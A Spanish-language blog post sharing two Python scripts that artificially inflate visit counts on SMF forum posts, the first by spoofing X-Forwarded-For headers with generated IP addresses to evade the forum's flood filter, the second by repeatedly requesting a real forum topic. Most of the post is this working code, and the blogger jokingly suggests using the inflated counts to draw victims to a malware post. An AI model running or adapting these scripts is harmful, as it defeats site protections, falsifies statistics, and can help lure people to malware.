SMF Incorrect Flood Filter Headers by HielaSangre y Once

3 comments
La siguiente entrada tal como lo dice el titulo viene de la manao de HielaSangre un viejo conocido amigo no se si decirlo asi, mejor lo dearemos como conocido es que le tengo miedito :3.


Pero ya enserio lo que hace el script realizado por Daniel es incrementar las visitas a una entrada, específicamente de ser dañina no lo es como lo dice el autor pero para andar juegando un ratito sirve y no solo eso, que tal si damos un post de un malware al ver tantas visitas alguien caera, solo digo ;).










Como dice Daniel: Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

#!/usr/bin/python
# RemoteExecution
#Autor: Daniel Godoy A.K.A hielasangre
 
import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
  def __init__(self, num):
      threading.Thread.__init__(self)
      self.num = num      
  def run(self):
    while 1:
        global a,b,c,d,count, url
        data = ""
        while 1:
            while 1:
                if d!=250:
                    d+=1
                else:
                    if c!= 250:
                        c+=2
                        d=0
                    else:
                        if b!=250:
                            c=0
                            d=0
                            b+=1
                        else:
                            a+=1
                            b=0
                            c=0
                            d=0
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
                headers = { 'X-Forwarded-For' : head }
                req = urllib2.Request(url, data, headers)
                f = urllib2.urlopen(req)
                count += 1
                print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
for i in range(3):      
        ta = SMFPwner(i)
        ta.start()

Editado: 23 de Agosto del 2014

Si el título fue cambiado debido a que siguiendo el hilo del foro en Underc0de, Eleven ahora Once, dio a conocer otra forma de realizar este flood espero les agrade :)


import time
    import urllib2
     
     
    class Pvisits(object):
        def __init__(self, url, nvisitas, delay=0):
            headers = {
                "Referer": url,
                "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
            }
       
            for x in xrange(nvisitas):
                time.sleep(delay)
                request = urllib2.Request(url, headers=headers)
                obj_web = urllib2.urlopen(request)
                codigo = obj_web.code
                if codigo == 200:
                    print obj_web.geturl(), codigo, nvisitas - x
                elif codigo >= 400:
                    print "Ocurrio un error:", codigo
                    return
     
     
    Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)

Fuente: Remoteexecution & Underc0de

Regards,
Snifer




3 comentarios

  1. No veo porque tener miedo amigo, no pasa nada.. Todo bien con vos ;)
    en serio a veces soy molesto pero no soy mala persona como para tenerle miedo. al contrario ;)

    ResponderEliminar
    Respuestas
    1. jajajaj si eres Daniel yo se porque U_u viejos recuerdos del ayer jajjajaj ;) tu me entiendes.

      Regards,
      Snifer

      Eliminar
  2. sisis era yo mismo el que respondio, lo digo en serio, no hay drama ;)

    ResponderEliminar